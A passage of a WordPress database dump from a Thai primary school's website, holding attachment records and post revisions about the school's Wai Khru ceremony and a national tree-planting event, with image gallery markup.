(1348,1,'2025-06-13 12:01:55','2025-06-13 05:01:55','','LINE_ALBUM_วันไหว้ครู 2568_250613_15','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_15','','','2025-06-13 12:01:55','2025-06-13 05:01:55','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_15.jpg',0,'attachment','image/jpeg',0),
(1349,1,'2025-06-13 12:01:57','2025-06-13 05:01:57','','LINE_ALBUM_วันไหว้ครู 2568_250613_16','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_16','','','2025-06-13 12:01:57','2025-06-13 05:01:57','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_16.jpg',0,'attachment','image/jpeg',0),
(1350,1,'2025-06-13 12:01:57','2025-06-13 05:01:57','','LINE_ALBUM_วันไหว้ครู 2568_250613_17','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_17','','','2025-06-13 12:01:57','2025-06-13 05:01:57','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_17.jpg',0,'attachment','image/jpeg',0),
(1351,1,'2025-06-13 12:01:57','2025-06-13 05:01:57','','S__76111879_0','','inherit','','closed','','s__76111879_0','','','2025-06-13 12:01:57','2025-06-13 05:01:57','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111879_0.jpg',0,'attachment','image/jpeg',0),
(1352,1,'2025-06-13 12:01:58','2025-06-13 05:01:58','','S__76111881_0','','inherit','','closed','','s__76111881_0','','','2025-06-13 12:01:58','2025-06-13 05:01:58','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111881_0.jpg',0,'attachment','image/jpeg',0),
(1353,1,'2025-06-13 12:01:58','2025-06-13 05:01:58','','S__76111882_0','','inherit','','closed','','s__76111882_0','','','2025-06-13 12:01:58','2025-06-13 05:01:58','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111882_0.jpg',0,'attachment','image/jpeg',0),
(1354,1,'2025-06-13 12:01:58','2025-06-13 05:01:58','','S__76111883_0','','inherit','','closed','','s__76111883_0','','','2025-06-13 12:01:58','2025-06-13 05:01:58','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111883_0.jpg',0,'attachment','image/jpeg',0),
(1355,1,'2025-06-13 12:01:59','2025-06-13 05:01:59','','S__76111884_0','','inherit','','closed','','s__76111884_0','','','2025-06-13 12:01:59','2025-06-13 05:01:59','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111884_0.jpg',0,'attachment','image/jpeg',0),
(1356,1,'2025-06-13 12:02:00','2025-06-13 05:02:00','','S__76111885_0','','inherit','','closed','','s__76111885_0','','','2025-06-13 12:02:00','2025-06-13 05:02:00','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111885_0.jpg',0,'attachment','image/jpeg',0),
(1357,1,'2025-06-13 12:02:02','2025-06-13 05:02:02','','S__76111886_0','','inherit','','closed','','s__76111886_0','','','2025-06-13 12:02:02','2025-06-13 05:02:02','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111886_0.jpg',0,'attachment','image/jpeg',0),
(1358,1,'2025-06-13 12:02:34','2025-06-13 05:02:34','<!-- wp:paragraph -->\n<p>เมื่อวันที่ 12 เดือนมิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันไหว้ครู เพื่อปลูกฝังให้ผู้เรียนได้เรียนรู้ ให้ความสำคัญและรำลึกถึงพระคุณครู ณ อาคารเฉลิมพระเกียรติ 80 พรรษา โดยมี ผู้อำนวยการเสน่หา พลโสภา เป็นประธานในพิธีในครั้งนี้ กิจกรรมประกอบไปด้วยวจนพิธีกรรม การกล่าวบทบูชาครู พร้อมทั้งร่วมกันร้องเพลงพระคุณที่สาม เพื่อมอบเป็นของขวัญแด่คุณครูในโอกาสวันไหว้ครู</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1334,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1334\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1339,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1339\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1335,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1335\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1338,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1338\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1336,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_5-1024x577.jpg\" alt=\"\" class=\"wp-image-1336\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1337,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_6-1024x577.jpg\" alt=\"\" class=\"wp-image-1337\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1340,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_7-1024x577.jpg\" alt=\"\" class=\"wp-image-1340\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1341,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_8-1024x577.jpg\" alt=\"\" class=\"wp-image-1341\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1342,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_9-1024x577.jpg\" alt=\"\" class=\"wp-image-1342\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1344,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_10-1024x577.jpg\" alt=\"\" class=\"wp-image-1344\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1345,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_11-1024x577.jpg\" alt=\"\" class=\"wp-image-1345\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1343,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_12-1024x577.jpg\" alt=\"\" class=\"wp-image-1343\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1346,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_13-1024x577.jpg\" alt=\"\" class=\"wp-image-1346\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1347,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_14-1024x577.jpg\" alt=\"\" class=\"wp-image-1347\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1348,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_15-1024x577.jpg\" alt=\"\" class=\"wp-image-1348\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1349,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_16-1024x577.jpg\" alt=\"\" class=\"wp-image-1349\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1350,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_17-1024x577.jpg\" alt=\"\" class=\"wp-image-1350\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1351,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111879_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1351\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1352,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111881_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1352\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1353,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111882_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1353\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1354,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111883_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1354\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1355,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111884_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1355\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1356,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111885_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1356\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1357,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111886_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1357\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','พิธีไหว้ครู  ประจำปีการศึกษา 2568','','inherit','closed','closed','','1333-revision-v1','','','2025-06-13 12:02:34','2025-06-13 05:02:34','',1333,'http://pakhaeng.ssk.in.th/?p=1358',0,'revision','',0),
(1359,1,'2025-06-13 12:05:56','2025-06-13 05:05:56','<!-- wp:paragraph -->\n<p><strong></strong><strong>วันที่ 12 มิถุนายน 2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ พร้อมด้วยคณะครู และบุคลากรทางการศึกษา จัดกิจกรรมโครงการปลูกต้นไม้แห่งชาติ \"รวมใจไทย ปลูกต้นไม้ เพื่อแผ่นดิน\" เนื่องในวโรกาสเฉลิมพระเกียรติ สมเด็จพระนางเจ้าสุทิดา พัชรสุธาพิมลลักษณ พระบรมราชินี</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1361,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395613_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1361\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1363,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395611_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1363\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1365,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395621_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1365\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1360,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__71196699-1024x683.jpg\" alt=\"\" class=\"wp-image-1360\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1364,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-724x1024.jpg\" alt=\"\" class=\"wp-image-1364\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1362,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6-768x1024.jpg\" alt=\"\" class=\"wp-image-1362\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1369,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5-768x1024.jpg\" alt=\"\" class=\"wp-image-1369\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1366,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4-768x1024.jpg\" alt=\"\" class=\"wp-image-1366\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1368,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3-768x1024.jpg\" alt=\"\" class=\"wp-image-1368\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1367,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2-768x1024.jpg\" alt=\"\" class=\"wp-image-1367\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1370,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1-768x1024.jpg\" alt=\"\" class=\"wp-image-1370\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','\"รวมใจไทย ปลูกต้นไม้ เพื่อแผ่นดิน\"','','publish','closed','closed','','%e0%b8%a3%e0%b8%a7%e0%b8%a1%e0%b9%83%e0%b8%88%e0%b9%84%e0%b8%97%e0%b8%a2-%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89-%e0%b9%80%e0%b8%9e%e0%b8%b7','','','2025-06-13 12:06:55','2025-06-13 05:06:55','',0,'http://pakhaeng.ssk.in.th/?p=1359',0,'post','',0),
(1360,1,'2025-06-13 12:05:25','2025-06-13 05:05:25','','S__71196699','','inherit','','closed','','s__71196699','','','2025-06-13 12:05:25','2025-06-13 05:05:25','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__71196699.jpg',0,'attachment','image/jpeg',0),
(1361,1,'2025-06-13 12:05:25','2025-06-13 05:05:25','','S__67395613_0','','inherit','','closed','','s__67395613_0','','','2025-06-13 12:05:25','2025-06-13 05:05:25','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395613_0.jpg',0,'attachment','image/jpeg',0),
(1362,1,'2025-06-13 12:05:26','2025-06-13 05:05:26','','LINE_ALBUM_ปลูกต้นไม้ , ประชุมเตรียมความพร้อมเปิเ_250613_6','','inherit','','closed','','line_album_%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5','','','2025-06-13 12:05:26','2025-06-13 05:05:26','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6.jpg',0,'attachment','image/jpeg',0),
(1363,1,'2025-06-13 12:05:26','2025-06-13 05:05:26','','S__67395611_0','','inherit','','closed','','s__67395611_0','','','2025-06-13 12:05:26','2025-06-13 05:05:26','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395611_0.jpg',0,'attachment','image/jpeg',0),
(1364,1,'2025-06-13 12:05:26','2025-06-13 05:05:26','','สีฟ้า สีส้ม ทันสมัย ข่าวประชาสัมพันธ์ การประชุมองค์กรท้องถิ่น จดหมายข่าว','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%9f%e0%b9%89%e0%b8%b2-%e0%b8%aa%e0%b8%b5%e0%b8%aa%e0%b9%89%e0%b8%a1-%e0%b8%97%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%a2-%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7','','','2025-06-13 12:05:26','2025-06-13 05:05:26','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว.jpg',0,'attachment','image/jpeg',0),
(1365,1,'2025-06-13 12:05:26','2025-06-13 05:05:26','','S__67395621_0','','inherit','','closed','','s__67395621_0','','','2025-06-13 12:05:26','2025-06-13 05:05:26','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395621_0.jpg',0,'attachment','image/jpeg',0),
(1366,1,'2025-06-13 12:05:29','2025-06-13 05:05:29','','LINE_ALBUM_ปลูกต้นไม้ , ประชุมเตรียมความพร้อมเปิเ_250613_4','','inherit','','closed','','line_album_%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5-2','','','2025-06-13 12:05:29','2025-06-13 05:05:29','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4.jpg',0,'attachment','image/jpeg',0),
(1367,1,'2025-06-13 12:05:30','2025-06-13 05:05:30','','LINE_ALBUM_ปลูกต้นไม้ , ประชุมเตรียมความพร้อมเปิเ_250613_2','','inherit','','closed','','line_album_%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5-3','','','2025-06-13 12:05:30','2025-06-13 05:05:30','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2.jpg',0,'attachment','image/jpeg',0),
(1368,1,'2025-06-13 12:05:30','2025-06-13 05:05:30','','LINE_ALBUM_ปลูกต้นไม้ , ประชุมเตรียมความพร้อมเปิเ_250613_3','','inherit','','closed','','line_album_%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5-4','','','2025-06-13 12:05:30','2025-06-13 05:05:30','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3.jpg',0,'attachment','image/jpeg',0),
(1369,1,'2025-06-13 12:05:30','2025-06-13 05:05:30','','LINE_ALBUM_ปลูกต้นไม้ , ประชุมเตรียมความพร้อมเปิเ_250613_5','','inherit','','closed','','line_album_%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5-5','','','2025-06-13 12:05:30','2025-06-13 05:05:30','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5.jpg',0,'attachment','image/jpeg',0),
(1370,1,'2025-06-13 12:05:30','2025-06-13 05:05:30','','LINE_ALBUM_ปลูกต้นไม้ , ประชุมเตรียมความพร้อมเปิเ_250613_1','','inherit','','closed','','line_album_%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5-6','','','2025-06-13 12:05:30','2025-06-13 05:05:30','',1359,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1.jpg',0,'attachment','image/jpeg',0),
(1371,1,'2025-06-13 12:05:56','2025-06-13 05:05:56','<!-- wp:paragraph -->\n<p><strong></strong><strong>วันที่ 12 มิถุนายน 2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ พร้อมด้วยคณะครู และบุคลากรทางการศึกษา จัดกิจกรรมโครงการปลูกต้นไม้แห่งชาติ \"รวมใจไทย ปลูกต้นไม้ เพื่อแผ่นดิน\" เนื่องในวโรกาสเฉลิมพระเกียรติ สมเด็จพระนางเจ้าสุทิดา พัชรสุธาพิมลลักษณ พระบรมราชินี</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1361,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395613_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1361\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1363,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395611_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1363\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1365,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__67395621_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1365\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1360,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__71196699-1024x683.jpg\" alt=\"\" class=\"wp-image-1360\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1364,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-724x1024.jpg\" alt=\"\" class=\"wp-image-1364\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1362,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_6-768x1024.jpg\" alt=\"\" class=\"wp-image-1362\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1369,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5-768x1024.jpg\" alt=\"\" class=\"wp-image-1369\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1366,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} 